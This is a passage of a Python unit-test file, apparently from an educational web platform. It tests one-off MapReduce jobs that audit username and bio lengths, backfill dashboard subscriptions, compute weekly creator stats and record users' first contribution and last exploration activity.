self.assertEqual(output['13'], 1)
self.assertEqual(output['2'], 1)
self.assertEqual(output['1'], 1)
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
self.signup(self.USER_D_EMAIL, self.USER_D_USERNAME)
output = self._run_one_off_job()
# Number of users = 5
# length of usernames = 13 (tmpsuperadm1n), 3 (bcd), 2 (ab, bc), 1 (a).
self.assertEqual(output['13'], 1)
self.assertEqual(output['3'], 1)
self.assertEqual(output['2'], 2)
self.assertEqual(output['1'], 1)
class UsernameLengthAuditOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off username length limit job."""
USER_1_EMAIL = '<EMAIL>'
USER_1_USERNAME = '123456789123456789123'
USER_2_EMAIL = '<EMAIL>'
USER_2_USERNAME = '123456789123456789124'
USER_3_EMAIL = '<EMAIL>'
USER_3_USERNAME = 'a' * 30
USER_4_EMAIL = '<EMAIL>'
# Username 4 length is 20, so it shouldn't be in the output.
USER_4_USERNAME = '12345678912345678912'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UsernameLengthAuditOneOffJob.create_new())
user_jobs_one_off.UsernameLengthAuditOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
return user_jobs_one_off.UsernameLengthAuditOneOffJob.get_output(job_id)
def test_username_length_limit(self):
self.signup(self.USER_1_EMAIL, self.USER_1_USERNAME)
self.signup(self.USER_2_EMAIL, self.USER_2_USERNAME)
self.signup(self.USER_3_EMAIL, self.USER_3_USERNAME)
expected_output = [u'[u\'Length: 21\', u"Usernames: [\'%s\', \'%s\']"]'
% (self.USER_1_USERNAME, self.USER_2_USERNAME),
u'[u\'Length: 30\', u"Usernames: [\'%s\']"]'
% self.USER_3_USERNAME]
actual_output = self._run_one_off_job()
self.assertEqual(actual_output, expected_output)
class LongUserBiosOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off long userbio length job."""
USER_A_EMAIL = '<EMAIL>'
USER_A_USERNAME = 'a'
USER_A_BIO = 'I am less than 500'
USER_B_EMAIL = '<EMAIL>'
USER_B_USERNAME = 'b'
USER_B_BIO = 'Long Bio' * 100
USER_C_EMAIL = '<EMAIL>'
USER_C_USERNAME = 'c'
USER_C_BIO = 'Same Bio' * 100
USER_D_EMAIL = '<EMAIL>'
USER_D_USERNAME = 'd'
USER_D_BIO = 'Diff Bio' * 300
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.LongUserBiosOneOffJob.create_new())
user_jobs_one_off.LongUserBiosOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.LongUserBiosOneOffJob.get_output(
job_id))
eval_output = [ast.literal_eval(stringified_item)
for stringified_item in stringified_output]
output = [[int(eval_item[0]), eval_item[1]]
for eval_item in eval_output]
return output
def test_no_userbio_returns_empty_list(self):
"""Tests the case when userbio is None."""
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
result = self._run_one_off_job()
self.assertEqual(result, [])
def test_short_userbio_returns_empty_list(self):
"""Tests the case where the userbio is less than 500 characters."""
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
user_id_a = self.get_user_id_from_email(self.USER_A_EMAIL)
user_services.update_user_bio(user_id_a, self.USER_A_BIO)
result = self._run_one_off_job()
self.assertEqual(result, [])
def test_long_userbio_length(self):
"""Tests the case where the userbio is more than 500 characters."""
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
user_id_b = self.get_user_id_from_email(self.USER_B_EMAIL)
user_services.update_user_bio(user_id_b, self.USER_B_BIO)
result = self._run_one_off_job()
expected_result = [[800, ['b']]]
self.assertEqual(result, expected_result)
def test_same_userbio_length(self):
"""Tests the case where two users have same userbio length."""
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
user_id_b = self.get_user_id_from_email(self.USER_B_EMAIL)
user_services.update_user_bio(user_id_b, self.USER_B_BIO)
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
user_id_c = self.get_user_id_from_email(self.USER_C_EMAIL)
user_services.update_user_bio(user_id_c, self.USER_C_BIO)
result = self._run_one_off_job()
result[0][1].sort()
expected_result = [[800, ['b', 'c']]]
self.assertEqual(result, expected_result)
def test_diff_userbio_length(self):
"""Tests the case where two users have different userbio lengths."""
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
user_id_c = self.get_user_id_from_email(self.USER_C_EMAIL)
user_services.update_user_bio(user_id_c, self.USER_C_BIO)
self.signup(self.USER_D_EMAIL, self.USER_D_USERNAME)
user_id_d = self.get_user_id_from_email(self.USER_D_EMAIL)
user_services.update_user_bio(user_id_d, self.USER_D_BIO)
result = sorted(self._run_one_off_job(), key=lambda x: x[0])
expected_result = [[800, ['c']], [2400, ['d']]]
self.assertEqual(result, expected_result)
def test_bio_length_for_users_with_no_bio(self):
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
user_id_a = self.get_user_id_from_email(self.USER_A_EMAIL)
model1 = user_models.UserSettingsModel(
id=user_id_a,
email=self.USER_A_EMAIL)
model1.update_timestamps()
model1.put()
result = self._run_one_off_job()
self.assertEqual(result, [])
class DashboardSubscriptionsOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off dashboard subscriptions job."""
EXP_ID_1 = 'exp_id_1'
EXP_ID_2 = 'exp_id_2'
COLLECTION_ID_1 = 'col_id_1'
COLLECTION_ID_2 = 'col_id_2'
EXP_ID_FOR_COLLECTION_1 = 'id_of_exp_in_collection_1'
USER_A_EMAIL = '<EMAIL>'
USER_A_USERNAME = 'a'
USER_B_EMAIL = '<EMAIL>'
USER_B_USERNAME = 'b'
USER_C_EMAIL = '<EMAIL>'
USER_C_USERNAME = 'c'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = user_jobs_one_off.DashboardSubscriptionsOneOffJob.create_new()
user_jobs_one_off.DashboardSubscriptionsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
def _null_fn(self, *args, **kwargs):
"""A mock for functions of the form subscribe_to_*() to represent
behavior prior to the implementation of subscriptions.
"""
pass
def setUp(self):
super(DashboardSubscriptionsOneOffJobTests, self).setUp()
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
self.user_a_id = self.get_user_id_from_email(self.USER_A_EMAIL)
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
self.user_b_id = self.get_user_id_from_email(self.USER_B_EMAIL)
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
self.user_c_id = self.get_user_id_from_email(self.USER_C_EMAIL)
self.user_a = user_services.get_user_actions_info(self.user_a_id)
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A creates and saves a new valid exploration.
self.save_new_valid_exploration(
self.EXP_ID_1, self.user_a_id, end_state_name='End')
def test_null_case(self):
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id, strict=False)
self.assertEqual(user_b_subscriptions_model, None)
self._run_one_off_job()
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id, strict=False)
self.assertEqual(user_b_subscriptions_model, None)
def test_feedback_thread_subscription(self):
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id, strict=False)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(user_b_subscriptions_model, None)
self.assertEqual(user_c_subscriptions_model, None)
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User B starts a feedback thread.
feedback_services.create_thread(
'exploration', self.EXP_ID_1, self.user_b_id, 'subject', 'text')
# User C adds to that thread.
thread_id = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)[0].id
feedback_services.create_message(
thread_id, self.user_c_id, None, None, 'more text')
self._run_one_off_job()
# Both users are subscribed to the feedback thread.
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id)
self.assertEqual(user_b_subscriptions_model.exploration_ids, [])
self.assertEqual(user_c_subscriptions_model.exploration_ids, [])
self.assertEqual(
user_b_subscriptions_model.general_feedback_thread_ids, [thread_id])
self.assertEqual(
user_c_subscriptions_model.general_feedback_thread_ids, [thread_id])
def test_exploration_subscription(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A adds user B as an editor to the exploration.
rights_manager.assign_role_for_exploration(
self.user_a, self.EXP_ID_1, self.user_b_id,
rights_domain.ROLE_EDITOR)
# User A adds user C as a viewer of the exploration.
rights_manager.assign_role_for_exploration(
self.user_a, self.EXP_ID_1, self.user_c_id,
rights_domain.ROLE_VIEWER)
self._run_one_off_job()
# Users A and B are subscribed to the exploration. User C is not.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(
user_a_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(
user_b_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(user_c_subscriptions_model, None)
def test_two_explorations(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A creates and saves another valid exploration.
self.save_new_valid_exploration(self.EXP_ID_2, self.user_a_id)
self._run_one_off_job()
# User A is subscribed to two explorations.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
self.assertEqual(
sorted(user_a_subscriptions_model.exploration_ids),
sorted([self.EXP_ID_1, self.EXP_ID_2]))
def test_community_owned_exploration(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A adds user B as an editor to the exploration.
rights_manager.assign_role_for_exploration(
self.user_a, self.EXP_ID_1, self.user_b_id,
rights_domain.ROLE_EDITOR)
# The exploration becomes community-owned.
rights_manager.publish_exploration(self.user_a, self.EXP_ID_1)
rights_manager.release_ownership_of_exploration(
self.user_a, self.EXP_ID_1)
# User C edits the exploration.
exp_services.update_exploration(
self.user_c_id, self.EXP_ID_1, [], 'Update exploration')
self._run_one_off_job()
# User A and user B are subscribed to the exploration; user C is not.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(
user_a_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(
user_b_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(user_c_subscriptions_model, None)
def test_deleted_exploration(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A deletes the exploration.
exp_services.delete_exploration(self.user_a_id, self.EXP_ID_1)
self.process_and_flush_pending_mapreduce_tasks()
self._run_one_off_job()
# User A is not subscribed to the exploration.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id, strict=False)
self.assertEqual(user_a_subscriptions_model, None)
def test_collection_subscription(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
# User A creates and saves a new valid collection.
self.save_new_valid_collection(
self.COLLECTION_ID_1, self.user_a_id,
exploration_id=self.EXP_ID_FOR_COLLECTION_1)
# User A adds user B as an editor to the collection.
rights_manager.assign_role_for_collection(
self.user_a, self.COLLECTION_ID_1, self.user_b_id,
rights_domain.ROLE_EDITOR)
# User A adds user C as a viewer of the collection.
rights_manager.assign_role_for_collection(
self.user_a, self.COLLECTION_ID_1, self.user_c_id,
rights_domain.ROLE_VIEWER)
self._run_one_off_job()
# Users A and B are subscribed to the collection. User C is not.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(
user_a_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
# User A is also subscribed to the exploration within the collection
# because they created both.
self.assertEqual(
sorted(user_a_subscriptions_model.exploration_ids), [
self.EXP_ID_1, self.EXP_ID_FOR_COLLECTION_1])
self.assertEqual(
user_b_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
self.assertEqual(user_c_subscriptions_model, None)
def test_two_collections(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
# User A creates and saves a new valid collection.
self.save_new_valid_collection(
self.COLLECTION_ID_1, self.user_a_id,
exploration_id=self.EXP_ID_FOR_COLLECTION_1)
# User A creates and saves another valid collection.
self.save_new_valid_collection(
self.COLLECTION_ID_2, self.user_a_id,
exploration_id=self.EXP_ID_FOR_COLLECTION_1)
self._run_one_off_job()
# User A is subscribed to two collections.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
self.assertEqual(
sorted(user_a_subscriptions_model.collection_ids),
sorted([self.COLLECTION_ID_1, self.COLLECTION_ID_2]))
def test_deleted_collection(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
# User A creates and saves a new collection.
self.save_new_default_collection(
self.COLLECTION_ID_1, self.user_a_id)
# User A deletes the collection.
collection_services.delete_collection(
self.user_a_id, self.COLLECTION_ID_1)
# User A deletes the exploration from earlier.
exp_services.delete_exploration(self.user_a_id, self.EXP_ID_1)
self.process_and_flush_pending_mapreduce_tasks()
self._run_one_off_job()
# User A is not subscribed to the collection.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id, strict=False)
self.assertEqual(user_a_subscriptions_model, None)
def test_adding_exploration_to_collection(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
# User B creates and saves a new collection.
self.save_new_default_collection(
self.COLLECTION_ID_1, self.user_b_id)
# User B adds the exploration created by user A to the collection.
collection_services.update_collection(
self.user_b_id, self.COLLECTION_ID_1, [{
'cmd': collection_domain.CMD_ADD_COLLECTION_NODE,
'exploration_id': self.EXP_ID_1
}], 'Add new exploration to collection.')
# Users A and B have no subscriptions (to either explorations or
# collections).
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id, strict=False)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id, strict=False)
self.assertEqual(user_a_subscriptions_model, None)
self.assertEqual(user_b_subscriptions_model, None)
self._run_one_off_job()
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
# User B should be subscribed to the collection and user A to the
# exploration.
self.assertEqual(
user_a_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(
user_a_subscriptions_model.collection_ids, [])
self.assertEqual(
user_b_subscriptions_model.exploration_ids, [])
self.assertEqual(
user_b_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
def test_community_owned_collection(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
rights_manager.publish_exploration(self.user_a, self.EXP_ID_1)
# User A creates and saves a new valid collection.
self.save_new_valid_collection(
self.COLLECTION_ID_1, self.user_a_id,
exploration_id=self.EXP_ID_1)
# User A adds user B as an editor to the collection.
rights_manager.assign_role_for_collection(
self.user_a, self.COLLECTION_ID_1, self.user_b_id,
rights_domain.ROLE_EDITOR)
# The collection becomes community-owned.
rights_manager.publish_collection(self.user_a, self.COLLECTION_ID_1)
rights_manager.release_ownership_of_collection(
self.user_a, self.COLLECTION_ID_1)
# User C edits the collection.
collection_services.update_collection(
self.user_c_id, self.COLLECTION_ID_1, [{
'cmd': collection_domain.CMD_EDIT_COLLECTION_PROPERTY,
'property_name': (
collection_domain.COLLECTION_PROPERTY_TITLE),
'new_value': 'New title'
}], 'Changed title.')
self._run_one_off_job()
# User A and user B are subscribed to the collection; user C is not.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(
user_a_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
self.assertEqual(
user_b_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
self.assertEqual(user_c_subscriptions_model, None)
class MockUserStatsAggregator(
user_jobs_continuous.UserStatsAggregator):
"""A modified UserStatsAggregator that does not start a new
batch job when the previous one has finished.
"""
@classmethod
def _get_batch_job_manager_class(cls):
return MockUserStatsMRJobManager
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
pass
class MockUserStatsMRJobManager(
user_jobs_continuous.UserStatsMRJobManager):
@classmethod
def _get_continuous_computation_class(cls):
return MockUserStatsAggregator
class DashboardStatsOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off dashboard stats job."""
CURRENT_DATE_AS_STRING = user_services.get_current_date_as_string()
DATE_AFTER_ONE_WEEK = (
(datetime.datetime.utcnow() + datetime.timedelta(7)).strftime(
feconf.DASHBOARD_STATS_DATETIME_STRING_FORMAT))
USER_SESSION_ID = 'session1'
EXP_ID_1 = 'exp_id_1'
EXP_ID_2 = 'exp_id_2'
EXP_VERSION = 1
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = user_jobs_one_off.DashboardStatsOneOffJob.create_new()
user_jobs_one_off.DashboardStatsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
def setUp(self):
super(DashboardStatsOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
def mock_get_current_date_as_string(self):
return self.CURRENT_DATE_AS_STRING
def _rate_exploration(self, user_id, exp_id, rating):
"""Assigns rating to the exploration corresponding to the given
exploration id.
Args:
user_id: str. The user id.
exp_id: str. The exploration id.
rating: int. The rating to be assigned to the given exploration.
"""
rating_services.assign_rating_to_exploration(user_id, exp_id, rating)
def _record_play(self, exp_id, state):
"""Calls StartExplorationEventHandler and records the 'play' event
corresponding to the given exploration id.
Args:
exp_id: str. The exploration id.
state: dict(str, *). The state of the exploration corresponding to
the given id.
"""
event_services.StartExplorationEventHandler.record(
exp_id, self.EXP_VERSION, state, self.USER_SESSION_ID, {},
feconf.PLAY_TYPE_NORMAL)
def test_weekly_stats_if_continuous_stats_job_has_not_been_run(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id)
exp_id = exploration.id
init_state_name = exploration.init_state_name
self._record_play(exp_id, init_state_name)
self._rate_exploration('user1', exp_id, 5)
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(weekly_stats, None)
self.assertEqual(
user_services.get_last_week_dashboard_stats(self.owner_id), None)
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
expected_results_list = [{
self.mock_get_current_date_as_string(): {
'num_ratings': 0,
'average_ratings': None,
'total_plays': 0
}
}]
self.assertEqual(weekly_stats, expected_results_list)
self.assertEqual(
user_services.get_last_week_dashboard_stats(self.owner_id),
expected_results_list[0])
def test_weekly_stats_if_no_explorations(self):
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(
weekly_stats, [{
self.mock_get_current_date_as_string(): {
'num_ratings': 0,
'average_ratings': None,
'total_plays': 0
}
}])
def test_weekly_stats_for_single_exploration(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id)
exp_id = exploration.id
init_state_name = exploration.init_state_name
self._record_play(exp_id, init_state_name)
self._rate_exploration('user1', exp_id, 5)
event_services.StatsEventsHandler.record(
self.EXP_ID_1, 1, {
'num_starts': 1,
'num_actual_starts': 0,
'num_completions': 0,
'state_stats_mapping': {}
})
self.process_and_flush_pending_tasks()
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(
weekly_stats, [{
self.mock_get_current_date_as_string(): {
'num_ratings': 1,
'average_ratings': 5.0,
'total_plays': 1
}
}])
def test_weekly_stats_for_multiple_explorations(self):
exploration_1 = self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id)
exp_id_1 = exploration_1.id
exploration_2 = self.save_new_valid_exploration(
self.EXP_ID_2, self.owner_id)
exp_id_2 = exploration_2.id
init_state_name_1 = exploration_1.init_state_name
self._record_play(exp_id_1, init_state_name_1)
self._rate_exploration('user1', exp_id_1, 5)
self._rate_exploration('user2', exp_id_2, 4)
event_services.StatsEventsHandler.record(
self.EXP_ID_1, 1, {
'num_starts': 1,
'num_actual_starts': 0,
'num_completions': 0,
'state_stats_mapping': {}
})
self.process_and_flush_pending_tasks()
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(
weekly_stats, [{
self.mock_get_current_date_as_string(): {
'num_ratings': 2,
'average_ratings': 4.5,
'total_plays': 1
}
}])
def test_stats_for_multiple_weeks(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id)
exp_id = exploration.id
init_state_name = exploration.init_state_name
self._rate_exploration('user1', exp_id, 4)
self._record_play(exp_id, init_state_name)
self._record_play(exp_id, init_state_name)
event_services.StatsEventsHandler.record(
self.EXP_ID_1, 1, {
'num_starts': 2,
'num_actual_starts': 0,
'num_completions': 0,
'state_stats_mapping': {}
})
self.process_and_flush_pending_tasks()
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(
weekly_stats, [{
self.mock_get_current_date_as_string(): {
'num_ratings': 1,
'average_ratings': 4.0,
'total_plays': 2
}
}])
MockUserStatsAggregator.stop_computation(self.owner_id)
self.process_and_flush_pending_mapreduce_tasks()
self._rate_exploration('user2', exp_id, 2)
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
def _mock_get_date_after_one_week():
"""Returns the date of the next week."""
return self.DATE_AFTER_ONE_WEEK
with self.swap(
user_services,
'get_current_date_as_string',
_mock_get_date_after_one_week):
self._run_one_off_job()
expected_results_list = [
{
self.mock_get_current_date_as_string(): {
'num_ratings': 1,
'average_ratings': 4.0,
'total_plays': 2
}
},
{
_mock_get_date_after_one_week(): {
'num_ratings': 2,
'average_ratings': 3.0,
'total_plays': 2
}
}
]
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(weekly_stats, expected_results_list)
self.assertEqual(
user_services.get_last_week_dashboard_stats(self.owner_id),
expected_results_list[1])
class UserFirstContributionMsecOneOffJobTests(test_utils.GenericTestBase):
EXP_ID = 'test_exp'
def setUp(self):
super(UserFirstContributionMsecOneOffJobTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.admin = user_services.get_user_actions_info(self.admin_id)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.get_user_actions_info(self.owner_id)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
def test_contribution_msec_updates_on_published_explorations(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.admin_id, end_state_name='End')
init_state_name = exploration.init_state_name
# Test that no contribution time is set.
job_id = (
user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new())
user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
self.assertIsNone(
user_services.get_user_settings(
self.admin_id).first_contribution_msec)
# Test all owners and editors of exploration after publication have
# updated times.
exp_services.publish_exploration_and_update_user_profiles(
self.admin, self.EXP_ID)
rights_manager.release_ownership_of_exploration(
self.admin, self.EXP_ID)
exp_services.update_exploration(
self.editor_id, self.EXP_ID, [exp_domain.ExplorationChange({
'cmd': 'edit_state_property',
'state_name': init_state_name,
'property_name': 'widget_id',
'new_value': 'MultipleChoiceInput'
}), exp_domain.ExplorationChange({
'cmd': 'edit_state_property',
'state_name': init_state_name,
'property_name': 'widget_customization_args',
'new_value': {
'choices': {
'value': [{
'content_id': 'ca_choices_0',
'html': '<p>Choice 1</p>'
}]
},
'showChoicesInShuffledOrder': {'value': True}
}
})], 'commit')
job_id = (
user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new())
user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
self.assertIsNotNone(user_services.get_user_settings(
self.admin_id).first_contribution_msec)
self.assertIsNotNone(user_services.get_user_settings(
self.editor_id).first_contribution_msec)
def test_contribution_msec_does_not_update_on_unpublished_explorations(
self):
self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, end_state_name='End')
exp_services.publish_exploration_and_update_user_profiles(
self.owner, self.EXP_ID)
# We now manually reset the user's first_contribution_msec to None.
# This is to test that the one off job skips over the unpublished
# exploration and does not reset the user's first_contribution_msec.
user_models.UserSettingsModel(
id=self.owner_id,
email='<EMAIL>',
username='username',
first_contribution_msec=None
).put()
rights_manager.unpublish_exploration(self.admin, self.EXP_ID)
# Test that first contribution time is not set for unpublished
# explorations.
job_id = (
user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new())
user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
self.assertIsNone(user_services.get_user_settings(
self.owner_id).first_contribution_msec)
def test_contribution_msec_is_not_generated_if_exploration_not_created(
self):
model1 = exp_models.ExplorationRightsSnapshotMetadataModel(
id='exp_id-1', committer_id=self.owner_id, commit_type='create')
model1.update_timestamps()
model1.put()
self.assertIsNone(user_services.get_user_settings(
self.owner_id).first_contribution_msec)
job_id = (
user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new())
user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
self.assertIsNone(user_services.get_user_settings(
self.owner_id).first_contribution_msec)
class UserLastExplorationActivityOneOffJobTests(test_utils.GenericTestBase):
def setUp(self):
super(UserLastExplorationActivityOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.exp_id = 'exp'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UserLastExplorationActivityOneOffJob.create_new())
user_jobs_one_off.UserLastExplorationActivityOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
def test_that_last_created_time_is_updated(self):
self.login(self.OWNER_EMAIL)
self.save_new_valid_exploration(
self.exp_id, self.owner_id, end_state_name='End')
self.logout()
user_models.UserSettingsModel(
id=self.owner_id,
email=self.OWNER_EMAIL,
last_created_an_exploration=None
).put()
owner_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNone(owner_settings.last_created_an_exploration)
self.assertIsNone(owner_settings.last_edited_an_exploration)
self._run_one_off_job()
